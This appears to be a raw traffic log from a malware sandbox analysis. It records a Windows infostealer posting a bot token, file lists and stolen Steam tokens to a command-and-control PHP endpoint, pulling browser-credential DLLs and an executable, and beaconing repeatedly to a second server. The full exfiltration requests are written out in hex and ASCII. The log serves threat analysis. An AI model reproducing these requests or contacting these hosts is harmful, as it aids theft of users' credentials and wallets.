Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIIIJKFCAAECAKFIEHCHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 39 35 35 62 36 34 37 34 38 36 64 36 66 62 64 66 63 36 33 34 39 31 32 65 39 38 62 63 39 63 66 65 33 38 32 39 30 63 38 38 30 34 63 39 30 37 66 61 32 64 37 36 37 33 64 30 37 61 61 64 30 38 32 62 65 63 36 34 34 62 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 2d 2d 0d 0a Data Ascii: ------FIIIIJKFCAAECAKFIEHCContent-Disposition: form-data; name="token"99955b647486d6fbdfc634912e98bc9cfe38290c8804c907fa2d7673d07aad082bec644b------FIIIIJKFCAAECAKFIEHCContent-Disposition: form-data; name="message"plugins------FIIIIJKFCAAECAKFIEHC--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBGHJEBKJEGHJKECAAKJHost: 185.172.128.76Content-Length: 7631Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAKFCGIJKJKFHIDHIIIHost: 185.172.128.76Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBGHJEBKJEGHJKECAAKJHost: 185.172.128.76Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHIEGIIIECAKEBFBAAHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 39 35 35 62 36 34 37 34 38 36 64 36 66 62 64 66 63 36 33 34 39 31 32 65 39 38 62 63 39 63 66 65 33 38 32 39 30 63 38 38 30 34 63 39 30 37 66 61 32 64 37 36 37 33 64 30 37 61 61 64 30 38 32 62 65 63 36 34 34 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 2d 2d 0d 0a Data Ascii: ------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="token"99955b647486d6fbdfc634912e98bc9cfe38290c8804c907fa2d7673d07aad082bec644b------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="file"------HIDHIEGIIIECAKEBFBAA--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGHJKFHJJJKJJJJKEHCBHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 39 35 35 62 36 34 37 34 38 36 64 36 66 62 64 66 63 36 33 34 39 31 32 65 39 38 62 63 39 63 66 65 33 38 32 39 30 63 38 38 30 34 63 39 30 37 66 61 32 64 37 36 37 33 64 30 37 61 61 64 30 38 32 62 65 63 36 34 34 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 2d 2d 0d 0a Data Ascii: ------EGHJKFHJJJKJJJJKEHCBContent-Disposition: form-data; name="token"99955b647486d6fbdfc634912e98bc9cfe38290c8804c907fa2d7673d07aad082bec644b------EGHJKFHJJJKJJJJKEHCBContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------EGHJKFHJJJKJJJJKEHCBContent-Disposition: form-data; name="file"------EGHJKFHJJJKJJJJKEHCB--
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHJDGIJECGDHJJECGHHost: 185.172.128.76Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCFBGDHJKFIEBFIECGHHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 39 35 35 62 36 34 37 34 38 36 64 36 66 62 64 66 63 36 33 34 39 31 32 65 39 38 62 63 39 63 66 65 33 38 32 39 30 63 38 38 30 34 63 39 30 37 66 61 32 64 37 36 37 33 64 30 37 61 61 64 30 38 32 62 65 63 36 34 34 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 2d 2d 0d 0a Data Ascii: ------BGCFBGDHJKFIEBFIECGHContent-Disposition: form-data; name="token"99955b647486d6fbdfc634912e98bc9cfe38290c8804c907fa2d7673d07aad082bec644b------BGCFBGDHJKFIEBFIECGHContent-Disposition: form-data; name="message"wallets------BGCFBGDHJKFIEBFIECGH--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGDHJJDGHCAAAKEHIJKHost: 185.172.128.76Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 39 35 35 62 36 34 37 34 38 36 64 36 66 62 64 66 63 36 33 34 39 31 32 65 39 38 62 63 39 63 66 65 33 38 32 39 30 63 38 38 30 34 63 39 30 37 66 61 32 64 37 36 37 33 64 30 37 61 61 64 30 38 32 62 65 63 36 34 34 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 2d 2d 0d 0a Data Ascii: ------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="token"99955b647486d6fbdfc634912e98bc9cfe38290c8804c907fa2d7673d07aad082bec644b------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="message"files------GDGDHJJDGHCAAAKEHIJK--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAKEBGDAFHIIDHIIECFHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJJKKJJDAAAAAKFHJJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEGDBKFIJDAKFIDGHJEHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIIJECAEGDHIDHJKKKKFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGCGCFHIEHIDGDBAAEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIDAECGDAFBAAAAAECGIHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCBKECAKFBGCAKECGIEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAFHIIJJECGDHIEGDAKHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFIEGIECGCBKFIEBGCAHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJJKKJJDAAAAAKFHJJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJKJJDBKEGIECAAECFHHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJDGCGDAAAKECAKKJDAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIJKKFHIEGCBGCAFIJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBGHJEBKJEGHJKECAAKJHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBFCAFCBKFIEBFHIDBAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKEGDGCGDAKEBFIJECHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBGIJEHIIDGCFHIEGDGCHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKJDAFHJDGDHJKKEGIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGDGHCBGDHJJKECAECBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBGHJEBKJEGHJKECAAKJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCBKECAKFBGCAKECGIEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJJEBFHDBGIECBFCBKJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJDGCGDAAAKECAKKJDAHost: 185.172.128.76Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 39 35 35 62 36 34 37 34 38 36 64 36 66 62 64 66 63 36 33 34 39 31 32 65 39 38 62 63 39 63 66 65 33 38 32 39 30 63 38 38 30 34 63 39 30 37 66 61 32 64 37 36 37 33 64 30 37 61 61 64 30 38 32 62 65 63 36 34 34 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 41 2d 2d 0d 0a Data Ascii: ------BKJDGCGDAAAKECAKKJDAContent-Disposition: form-data; name="token"99955b647486d6fbdfc634912e98bc9cfe38290c8804c907fa2d7673d07aad082bec644b------BKJDGCGDAAAKECAKKJDAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BKJDGCGDAAAKECAKKJDAContent-Disposition: form-data; name="file"------BKJDGCGDAAAKECAKKJDA--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIDHCAAKECGCBFIJDBHost: 185.172.128.76Content-Length: 125787Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBKJKJKKJDGDGDGIDGHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 4a 4b 4a 4b 4b 4a 44 47 44 47 44 47 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 39 35 35 62 36 34 37 34 38 36 64 36 66 62 64 66 63 36 33 34 39 31 32 65 39 38 62 63 39 63 66 65 33 38 32 39 30 63 38 38 30 34 63 39 30 37 66 61 32 64 37 36 37 33 64 30 37 61 61 64 30 38 32 62 65 63 36 34 34 62 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 4a 4b 4a 4b 4b 4a 44 47 44 47 44 47 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 68 65 72 37 68 34 38 72 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 4a 4b 4a 4b 4b 4a 44 47 44 47 44 47 49 44 47 2d 2d 0d 0a Data Ascii: ------GHDBKJKJKKJDGDGDGIDGContent-Disposition: form-data; name="token"99955b647486d6fbdfc634912e98bc9cfe38290c8804c907fa2d7673d07aad082bec644b------GHDBKJKJKKJDGDGDGIDGContent-Disposition: form-data; name="message"her7h48r------GHDBKJKJKKJDGDGDGIDG--
Source: global traffic	HTTP traffic detected: GET /tiktok.exe HTTP/1.1Host: 185.172.128.203Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
